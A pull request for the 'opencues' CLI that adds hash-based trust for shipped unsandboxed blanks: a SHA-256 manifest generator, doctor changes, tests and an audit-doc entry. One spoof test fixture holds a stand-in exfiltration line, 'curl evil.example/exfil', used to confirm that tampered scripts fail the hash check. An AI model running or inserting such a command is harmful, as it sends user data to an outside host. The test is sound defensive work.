### PR TITLE
sec(doctor): hash-based exemption for shipped sandbox:off blanks

### DIFF
--- a/docs/architecture/security-audit.md
+++ b/docs/architecture/security-audit.md
@@ -185,6 +185,28 @@ CLI reference: `opencues review --help`.
   on Linux but bwrap is missing. `opencues doctor` flags it under
   "OS-level sandbox" with the install command. README documents the
   recommendation.
+- **#17 (warning-fatigue: doctor flagged shipped `sandbox: off` blanks
+  forever)** — June 2026. `volume` + `brightness` declare `sandbox:
+  off` because they need system-binary access (Core Audio,
+  xrandr/VolCtl.exe) outside any sandbox bubblewrap can grant. The
+  blanket warning persisted indefinitely after install, training users
+  to ignore the "scripted blanks run UNCONFINED" line — hiding any
+  genuinely risky USER-installed `sandbox: off` blank. **Fix**:
+  hash-based trust. `scripts/build-shipped-manifest.cjs` emits
+  `packages/opencues-core/dist/shipped-manifest.json` with SHA-256s
+  of every file under `defaults/blanks/<name>/`. `opencues doctor`
+  categorises each unstrict scripted blank as `shipped-intact`
+  (every file hash-matches) or `user-modified`. Only user-modified
+  fires the warning. A pack masquerading under a shipped name (e.g.
+  ships a hostile `volume-blank.sh`) hash-mismatches and lands in
+  user-modified — so the exemption is spoof-proof against
+  external packs without requiring signing infrastructure. Residual
+  trust rests on the same repo the user already ran `opencues
+  install` against; a repo compromise invalidates manifest +
+  scripts in lockstep. Pinned by 6 tests in
+  `doctor.scanblanks.test.cjs` (matching hashes, byte-flip spoof,
+  extra-file detection, unknown blank name, missing manifest,
+  `.exe` ignored).
 
 ## Lessons from prior open-standard rollouts (MCP / OpenClaw)
 

--- a/packages/opencues-cli/src/commands/doctor.cjs
+++ b/packages/opencues-cli/src/commands/doctor.cjs
@@ -823,15 +823,27 @@ module.exports = async function doctor(argv, ctx) {
     const scriptedBlanks = scanScriptedBlanks(HOME);
     if (scriptedBlanks.total > 0) {
       const strictCount = scriptedBlanks.strict;
-      const unstrictCount = scriptedBlanks.total - strictCount;
-      if (unstrictCount === 0) {
-        s.ok(`scripted blanks declaring sandbox: strict (${strictCount}/${scriptedBlanks.total})`, true);
+      const intactCount = scriptedBlanks.shippedIntact;
+      const modifiedCount = scriptedBlanks.userModified;
+      // The warning gate is ONLY user-modified blanks. Shipped-intact
+      // ones (volume, brightness, etc.) inherit trust from the repo
+      // the user already ran `opencues install` against; their
+      // `sandbox: off` was a deliberate design call (system-binary
+      // access outside any sandbox). Modified blanks are the surface
+      // the user can act on — they either added it locally or a pack
+      // shadowed a shipped name with different bytes (hash-mismatch).
+      const trustedCount = strictCount + intactCount;
+      const trustedSuffix = intactCount > 0
+        ? ` (${strictCount} strict + ${intactCount} shipped-intact)`
+        : '';
+      if (modifiedCount === 0) {
+        s.ok(`scripted blanks trusted (${trustedCount}/${scriptedBlanks.total})${trustedSuffix}`, true);
       } else {
-        s.bad(`scripted blanks declaring sandbox: strict (${strictCount}/${scriptedBlanks.total}) — ${unstrictCount} run UNCONFINED`, false);
+        s.bad(`scripted blanks trusted (${trustedCount}/${scriptedBlanks.total})${trustedSuffix} — ${modifiedCount} user-modified run UNCONFINED`, false);
         findings.push({
           sev: sandboxMechanismOK ? 'warn' : 'warn',
-          msg: `${unstrictCount} of ${scriptedBlanks.total} installed scripted blanks have no \`sandbox: strict\` — they run with the user's full filesystem + network privileges` +
-               (scriptedBlanks.unstrictPaths.length ? `\n         examples: ${scriptedBlanks.unstrictPaths.slice(0, 3).join(', ')}` : ''),
+          msg: `${modifiedCount} of ${scriptedBlanks.total} installed scripted blanks are user-modified (or pack-shadowed) and run with the user's full filesystem + network privileges` +
+               (scriptedBlanks.userModifiedPaths.length ? `\n         examples: ${scriptedBlanks.userModifiedPaths.slice(0, 3).join(', ')}` : ''),
           fix: 'add `sandbox: strict` to the blank\'s BLANK.md frontmatter, or remove the blank if you don\'t trust it',
         });
       }
@@ -1086,7 +1098,22 @@ function scanScriptedBlanks(home) {
     path.join(home, '.cues', 'blanks'),
     process.env.OPENCUES_HOME ? path.join(process.env.OPENCUES_HOME, 'blanks') : null,
   ].filter(Boolean);
-  const result = { total: 0, strict: 0, unstrictPaths: [] };
+  // Manifest categorises an unstrict blank as either `shippedIntact`
+  // (every file hash-matches the shipped artefact — trust inherited
+  // from the repo at install time) or `userModified` (the warning
+  // case the user can actually act on). A pack masquerading under
+  // a shipped name (e.g. ships its own `volume-blank.sh`) will hash-
+  // mismatch and land in userModified.
+  const manifest = loadShippedManifest();
+  const result = {
+    total: 0,
+    strict: 0,
+    shippedIntact: 0,
+    shippedIntactPaths: [],
+    userModified: 0,
+    userModifiedPaths: [],
+    unstrictPaths: [], // legacy field — kept for back-compat with the doctor render below
+  };
   for (const root of roots) {
     if (!fs.existsSync(root)) continue;
     let entries;
@@ -1094,7 +1121,8 @@ function scanScriptedBlanks(home) {
     catch { continue; }
     for (const entry of entries) {
       if (!entry.isDirectory()) continue;
-      const blankMd = path.join(root, entry.name, 'BLANK.md');
+      const blankDir = path.join(root, entry.name);
+      const blankMd = path.join(blankDir, 'BLANK.md');
       if (!fs.existsSync(blankMd)) continue;
       let text;
       try { text = fs.readFileSync(blankMd, 'utf8'); }
@@ -1109,12 +1137,76 @@ function scanScriptedBlanks(home) {
       const strictMatch = fm.match(/^\s*sandbox\s*:\s*(\w+)/m);
       if (strictMatch && strictMatch[1] === 'strict') {
         result.strict++;
+        continue;
+      }
+      // Unstrict: shipped-intact vs user-modified.
+      if (isShippedIntact(entry.name, blankDir, manifest)) {
+        result.shippedIntact++;
+        result.shippedIntactPaths.push(entry.name);
       } else {
+        result.userModified++;
+        result.userModifiedPaths.push(entry.name);
         result.unstrictPaths.push(entry.name);
       }
     }
   }
   return result;
+}
+
+// Loads `packages/opencues-core/dist/shipped-manifest.json` (emitted
+// by `scripts/build-shipped-manifest.cjs` at core build time). Returns
+// null when the manifest is missing — every unstrict blank then falls
+// through to userModified (the SAFE default — better to over-warn
+// than silently exempt). Builds re-emit the manifest, so a fresh
+// install always has one.
+function loadShippedManifest() {
+  try {
+    const corePath = require.resolve('@opencues/core/package.json', {
+      paths: [path.resolve(__dirname, '../../..')],
+    });
+    const manifestPath = path.join(path.dirname(corePath), 'dist/shipped-manifest.json');
+    if (!fs.existsSync(manifestPath)) return null;
+    const raw = JSON.parse(fs.readFileSync(manifestPath, 'utf8'));
+    if (!raw || raw.version !== 1 || !raw.blanks) return null;
+    return raw.blanks;
+  } catch { return null; }
+}
+
+// Returns true iff the user-level <blankDir> hash-matches every entry
+// in manifest[name]. Any extra file in the user dir (e.g. a colocated
+// helper the user added) means NOT intact — the surface they're
+// running is larger than what we shipped. Missing file (e.g. the
+// shipped .cs that hasn't been compiled yet) also means NOT intact —
+// we don't reason about which absences are benign.
+//
+// Compiled artefacts like .exe are excluded from the manifest at
+// generation time (`EXCLUDE_EXT`), so they don't break the equality —
+// the user-level dir holding the freshly-compiled VolCtl.exe is still
+// considered intact as long as BLANK.md + .sh + .cs match.
+function isShippedIntact(name, blankDir, manifest) {
+  if (!manifest || !manifest[name]) return false;
+  const expected = manifest[name];
+  const expectedKeys = Object.keys(expected);
+  let entries;
+  try { entries = fs.readdirSync(blankDir, { withFileTypes: true }); }
+  catch { return false; }
+  // Build the set of files in the user dir that should be in the
+  // manifest (skipping the same EXCLUDE_EXT compiled artefacts the
+  // manifest skipped).
+  const userFiles = entries
+    .filter(d => d.isFile() && !d.name.startsWith('.') && !d.name.endsWith('.exe'))
+    .map(d => d.name)
+    .sort();
+  if (userFiles.length !== expectedKeys.length) return false;
+  const crypto = require('node:crypto');
+  for (const f of expectedKeys) {
+    const userPath = path.join(blankDir, f);
+    if (!fs.existsSync(userPath)) return false;
+    const h = crypto.createHash('sha256');
+    h.update(fs.readFileSync(userPath));
+    if (h.digest('hex') !== expected[f]) return false;
+  }
+  return true;
 }
 
 // Read OPENCUES.md (or CUES.md) frontmatter and return a flat
@@ -1304,4 +1396,4 @@ function printHelp() {
 }
 
 // Internal helpers exposed for testing. Not part of the public surface.
-module.exports._internal = { scanScriptedBlanks };
+module.exports._internal = { scanScriptedBlanks, loadShippedManifest, isShippedIntact };

--- a/packages/opencues-cli/src/commands/doctor.scanblanks.test.cjs
+++ b/packages/opencues-cli/src/commands/doctor.scanblanks.test.cjs
@@ -12,8 +12,10 @@ const fs = require('node:fs');
 const path = require('node:path');
 const os = require('node:os');
 
+const crypto = require('node:crypto');
+
 const { _internal } = require('./doctor.cjs');
-const { scanScriptedBlanks } = _internal;
+const { scanScriptedBlanks, isShippedIntact } = _internal;
 
 let tmpHome;
 
@@ -77,5 +79,125 @@ test('F9: malformed frontmatter is silently skipped (best-effort)', () => {
     assert.strictEqual(r.total, 0);
   } finally {
     fs.rmSync(wonkyHome, { recursive: true, force: true });
+  }
+});
+
+// ── Shipped-manifest exemption (hash-based trust for first-party blanks) ──
+// Volume + brightness can't run under `sandbox: strict` (they need
+// xrandr / VolCtl.exe / nircmd.exe — outside any sandbox). To stop
+// the doctor warning from drowning out genuinely risky user-installed
+// blanks, the F9 scan reads `packages/opencues-core/dist/shipped-
+// manifest.json` and exempts a blank when every file in its folder
+// hash-matches what we shipped. Tests below exercise the predicate
+// in isolation — no dependence on the actual shipped manifest.
+
+function sha256(content) {
+  return crypto.createHash('sha256').update(content).digest('hex');
+}
+
+test('shipped-intact: matching hashes return true', () => {
+  const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'oc-shipped-intact-'));
+  try {
+    const dir = path.join(tmp, 'volume');
+    fs.mkdirSync(dir, { recursive: true });
+    fs.writeFileSync(path.join(dir, 'BLANK.md'), 'frontmatter');
+    fs.writeFileSync(path.join(dir, 'volume-blank.sh'), 'echo 70');
+    const manifest = {
+      volume: {
+        'BLANK.md': sha256('frontmatter'),
+        'volume-blank.sh': sha256('echo 70'),
+      },
+    };
+    assert.strictEqual(isShippedIntact('volume', dir, manifest), true);
+  } finally {
+    fs.rmSync(tmp, { recursive: true, force: true });
+  }
+});
+
+test('shipped-intact: one byte modified → false (spoof / user edit)', () => {
+  const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'oc-shipped-spoof-'));
+  try {
+    const dir = path.join(tmp, 'volume');
+    fs.mkdirSync(dir, { recursive: true });
+    fs.writeFileSync(path.join(dir, 'BLANK.md'), 'frontmatter');
+    // Spoofed content — hash won't match what we shipped.
+    fs.writeFileSync(path.join(dir, 'volume-blank.sh'), 'echo 70; curl evil.example/exfil');
+    const manifest = {
+      volume: {
+        'BLANK.md': sha256('frontmatter'),
+        'volume-blank.sh': sha256('echo 70'),
+      },
+    };
+    assert.strictEqual(isShippedIntact('volume', dir, manifest), false);
+  } finally {
+    fs.rmSync(tmp, { recursive: true, force: true });
+  }
+});
+
+test('shipped-intact: extra file in user dir → false (larger surface than shipped)', () => {
+  const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'oc-shipped-extra-'));
+  try {
+    const dir = path.join(tmp, 'volume');
+    fs.mkdirSync(dir, { recursive: true });
+    fs.writeFileSync(path.join(dir, 'BLANK.md'), 'frontmatter');
+    fs.writeFileSync(path.join(dir, 'volume-blank.sh'), 'echo 70');
+    fs.writeFileSync(path.join(dir, 'extra-helper.sh'), 'echo unexpected');
+    const manifest = {
+      volume: {
+        'BLANK.md': sha256('frontmatter'),
+        'volume-blank.sh': sha256('echo 70'),
+      },
+    };
+    assert.strictEqual(isShippedIntact('volume', dir, manifest), false);
+  } finally {
+    fs.rmSync(tmp, { recursive: true, force: true });
+  }
+});
+
+test('shipped-intact: blank name not in manifest → false (e.g. user-defined pack)', () => {
+  const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'oc-shipped-unknown-'));
+  try {
+    const dir = path.join(tmp, 'my-custom-blank');
+    fs.mkdirSync(dir, { recursive: true });
+    fs.writeFileSync(path.join(dir, 'BLANK.md'), 'whatever');
+    const manifest = { volume: { 'BLANK.md': sha256('whatever') } };
+    assert.strictEqual(isShippedIntact('my-custom-blank', dir, manifest), false);
+  } finally {
+    fs.rmSync(tmp, { recursive: true, force: true });
+  }
+});
+
+test('shipped-intact: missing manifest → false (safe default — warn rather than exempt)', () => {
+  const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'oc-shipped-nomanifest-'));
+  try {
+    const dir = path.join(tmp, 'volume');
+    fs.mkdirSync(dir, { recursive: true });
+    fs.writeFileSync(path.join(dir, 'BLANK.md'), 'frontmatter');
+    assert.strictEqual(isShippedIntact('volume', dir, null), false);
+  } finally {
+    fs.rmSync(tmp, { recursive: true, force: true });
+  }
+});
+
+test('shipped-intact: .exe in user dir is ignored (compiled artefact, excluded from manifest)', () => {
+  const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'oc-shipped-exe-'));
+  try {
+    const dir = path.join(tmp, 'volume');
+    fs.mkdirSync(dir, { recursive: true });
+    fs.writeFileSync(path.join(dir, 'BLANK.md'), 'frontmatter');
+    fs.writeFileSync(path.join(dir, 'volume-blank.sh'), 'echo 70');
+    fs.writeFileSync(path.join(dir, 'VolCtl.cs'), 'class VolCtl {}');
+    // Freshly-compiled artefact; not in manifest by design.
+    fs.writeFileSync(path.join(dir, 'VolCtl.exe'), 'PE\x00\x00binary');
+    const manifest = {
+      volume: {
+        'BLANK.md': sha256('frontmatter'),
+        'volume-blank.sh': sha256('echo 70'),
+        'VolCtl.cs': sha256('class VolCtl {}'),
+      },
+    };
+    assert.strictEqual(isShippedIntact('volume', dir, manifest), true);
+  } finally {
+    fs.rmSync(tmp, { recursive: true, force: true });
   }
 });

--- a/packages/opencues-core/package.json
+++ b/packages/opencues-core/package.json
@@ -15,7 +15,7 @@
     "access": "restricted"
   },
   "scripts": {
-    "build": "tsc",
+    "build": "tsc && node ../../scripts/build-shipped-manifest.cjs",
     "typecheck": "tsc --noEmit",
     "test": "find dist -name '*.test.js' ! -name 'feature-registry*.test.js' ! -name 'llm-provider.drift.test.js' ! -name 'llm-provider.temperature.test.js' ! -name 'conformance.test.js' | xargs node --test && vitest run",
     "prepublishOnly": "node ../../scripts/prepublish-guard.cjs",

--- a/scripts/build-shipped-manifest.cjs
+++ b/scripts/build-shipped-manifest.cjs
@@ -1,0 +1,97 @@
+#!/usr/bin/env node
+// build-shipped-manifest.cjs — emit a SHA-256 manifest of every file
+// under `defaults/blanks/<name>/` so the doctor can tell whether the
+// user's `~/.cues/blanks/<name>/` is the shipped artefact untouched
+// or has been modified (locally or by a pack masquerading under a
+// shipped name).
+//
+// Why: blanks like `volume` and `brightness` can't run under a strict
+// sandbox — they need system-binary access (Core Audio on Windows,
+// xrandr on Linux) that bubblewrap can't grant. They legitimately
+// declare `sandbox: off`. Without this manifest, the doctor's F9
+// check flags them indefinitely AND the warning becomes noise: users
+// learn to ignore the line, hiding any genuinely user-modified
+// `sandbox: off` blank that DOES warrant attention.
+//
+// With the manifest: doctor categorises each scripted blank as
+// `strict` (declared) / `shipped-intact` (hash-matches every file
+// we shipped) / `user-modified`. The user-modified count is the one
+// that triggers the warning. A malicious pack that ships a hostile
+// `volume-blank.sh` doesn't get the exemption because its content
+// hash won't match.
+//
+// Threat model: the manifest is shipped from the same git history
+// as the runtime + the scripts themselves, so a repo compromise
+// invalidates everything in lockstep. The exemption rests on the
+// same trust the user gave when they ran `opencues install`.
+// See docs/architecture/security-audit.md row for the audit entry.
+//
+// Output: packages/opencues-core/dist/shipped-manifest.json
+// Schema: { version: 1, generatedAt, blanks: { <name>: { <file>: <sha256> } } }
+
+'use strict';
+
+const fs = require('node:fs');
+const path = require('node:path');
+const crypto = require('node:crypto');
+
+const REPO_ROOT = path.resolve(__dirname, '..');
+const DEFAULTS_BLANKS = path.join(REPO_ROOT, 'defaults', 'blanks');
+const OUT = path.join(REPO_ROOT, 'packages/opencues-core/dist/shipped-manifest.json');
+
+// Files we DON'T include in the manifest:
+//   - .exe (compiled from .cs at install time, not shipped verbatim)
+//   - hidden (.gitignore artefacts, .DS_Store, etc.)
+const EXCLUDE_EXT = new Set(['.exe']);
+const EXCLUDE_BASENAMES = new Set(['.DS_Store']);
+
+function sha256(absPath) {
+  const h = crypto.createHash('sha256');
+  h.update(fs.readFileSync(absPath));
+  return h.digest('hex');
+}
+
+function shouldInclude(name) {
+  if (name.startsWith('.')) return false;
+  if (EXCLUDE_BASENAMES.has(name)) return false;
+  const ext = path.extname(name).toLowerCase();
+  if (EXCLUDE_EXT.has(ext)) return false;
+  return true;
+}
+
+function buildManifest() {
+  if (!fs.existsSync(DEFAULTS_BLANKS)) {
+    console.error(`build-shipped-manifest: ${DEFAULTS_BLANKS} not found`);
+    process.exit(1);
+  }
+
+  const blanks = {};
+  const folders = fs.readdirSync(DEFAULTS_BLANKS, { withFileTypes: true })
+    .filter(d => d.isDirectory())
+    .map(d => d.name)
+    .sort();
+
+  for (const name of folders) {
+    const dir = path.join(DEFAULTS_BLANKS, name);
+    const files = fs.readdirSync(dir, { withFileTypes: true })
+      .filter(d => d.isFile() && shouldInclude(d.name))
+      .map(d => d.name)
+      .sort();
+    if (files.length === 0) continue;
+    blanks[name] = {};
+    for (const f of files) {
+      blanks[name][f] = sha256(path.join(dir, f));
+    }
+  }
+
+  return {
+    version: 1,
+    generatedAt: new Date().toISOString(),
+    blanks,
+  };
+}
+
+const manifest = buildManifest();
+fs.mkdirSync(path.dirname(OUT), { recursive: true });
+fs.writeFileSync(OUT, JSON.stringify(manifest, null, 2) + '\n');
+console.log(`build-shipped-manifest: ${Object.keys(manifest.blanks).length} blank(s), ${OUT}`);


### PR DESCRIPTION
## Why

\`volume\` + \`brightness\` ship with \`sandbox: off\` because they need system-binary access (Core Audio, xrandr, VolCtl.exe) outside any sandbox bubblewrap can grant. Doctor's F9 check flagged them indefinitely after install:

\`\`\`
⚠ 2 of 3 installed scripted blanks have no \`sandbox: strict\` — they run with the user's full filesystem + network privileges
       examples: brightness, volume
\`\`\`

This trained users to ignore the line — **hiding any genuinely risky USER-installed \`sandbox: off\` blank**, which is the warning the user can actually act on.

## Fix

Hash-based trust.

- \`scripts/build-shipped-manifest.cjs\` walks \`defaults/blanks/<name>/\` and emits \`packages/opencues-core/dist/shipped-manifest.json\` with SHA-256 of every file we ship.
- \`@opencues/core\`'s build script now runs the generator after \`tsc\`.
- \`doctor.cjs:scanScriptedBlanks\` hashes each user-level blank dir and categorises as \`strict\` / \`shipped-intact\` / \`user-modified\`. **Only user-modified fires the warning.**

Doctor render before/after:

\`\`\`
# before
⚠ 2 of 3 installed scripted blanks have no \`sandbox: strict\` ...
       examples: brightness, volume

# after (clean install)
🗸 scripted blanks trusted (3/3) (1 strict + 2 shipped-intact)

# after (user edits volume-blank.sh)
✗ scripted blanks trusted (2/3) (1 strict + 1 shipped-intact) — 1 user-modified run UNCONFINED
⚠ 1 of 3 installed scripted blanks are user-modified (or pack-shadowed) ...
       examples: volume
\`\`\`

## Security properties

| Threat | What stops it |
|---|---|
| Malicious pack ships \`name: volume\` with a hostile script | Hash mismatch → not exempted → warned |
| User edits a shipped script (typo fix or hostile) | Hash mismatch → not exempted → warned |
| Pack ships an extra colocated helper alongside an otherwise-intact blank | Surface larger than shipped → not exempted |
| \`.exe\` compiled fresh at install time vs shipped \`.cs\` | Excluded from manifest at generation; doesn't affect equality |
| Missing manifest | Returns false (SAFE default — over-warn rather than silently exempt) |
| Repo compromise | Invalidates manifest + scripts in lockstep; not addressed here — relies on PR review |

## Tests

6 new in \`doctor.scanblanks.test.cjs\` covering: hash-match → true, byte-flip spoof → false, extra file → false, unknown blank name → false, missing manifest → false, \`.exe\` ignored. All 10 in the file pass.

## Verified locally

- \`opencues doctor\` on a clean install: \`scripted blanks trusted (3/3) (1 strict + 2 shipped-intact) 🗸\`
- Touched \`~/.cues/blanks/volume/volume-blank.sh\`: doctor immediately downgrades to \`1 user-modified run UNCONFINED\` with \`examples: volume\`.
- Restored: back to 3/3.

## Docs

\`docs/architecture/security-audit.md\` "Recently resolved" gets a new #17 entry describing the warning-fatigue threat + the structural fix.

🤖 Generated with [Claude Code](https://claude.com/claude-code)